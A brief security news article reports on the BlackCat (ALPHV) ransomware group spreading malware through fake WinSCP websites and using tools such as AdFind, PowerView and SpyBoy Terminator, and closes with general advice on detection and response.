HQ/EMEAFind out how we can help your business
New research revealed that the BlackCat ransomware group upgraded its TTPs earlier this year to deploy more efficient attacks against targeted entities. Moreover, BlackCat, also known as the ALPHV group, is among the top 10 most active ransomware groups worldwide today.
The group also has an appalling record of stealing sensitive medical and financial data from numerous firms. Currently, the group continues to infect more organisations globally.
The BlackCat ransomware impersonates an app to propagate.
According to investigations, the BlackCat ransomware group has been impersonating the websites of a popular Windows app called WinSCP to infect its targets. WinSCP is a well-known file transfer application.
In addition, the new campaign distributes the fake website through browsers, such as Bing or Google. The mimicking strategy acts as bait to potentially compromise the computers of system admins, IT professionals, and web admins. The attack also looks to acquire admin-level privileges in the process.
Once the attack is successful, it allows the threat actors to establish persistence, steal passwords, and access backup servers.
Furthermore, the BlackCat operators also used several tools in the following stages of their attacks. Based on reports, the ransomware group uses PowerShell commands, AdFind, PuTTY Secure Copy, Findstr, and PowerView for retrieving Active Directory, collecting user information, extracting ZIP files, lateral movement, and bypassing antimalware solutions.
Furthermore, the BlackCat actors could also use the SpyBoy Terminator alongside the earlier-mentioned tools. This malicious tool could terminate several Windows security tools through a BYOVD mechanism.
The BlackCat ransomware group has developed a new malware variant called Sphynx. The new variant could prioritise speed and stealth to avoid security detection and complete its tasks. Earlier this year, this notorious ransomware group added a new extortion tactic to its arsenal by creating a copy of its victim’s website to post stolen information on its page.
Cybersecurity experts explained that organisations should prevent unauthorised access to their systems. They should also increase the efficiency of their detection and response process. Lastly, immediate remediation is crucial for every organisation since threat actors could exploit any delay in response time.
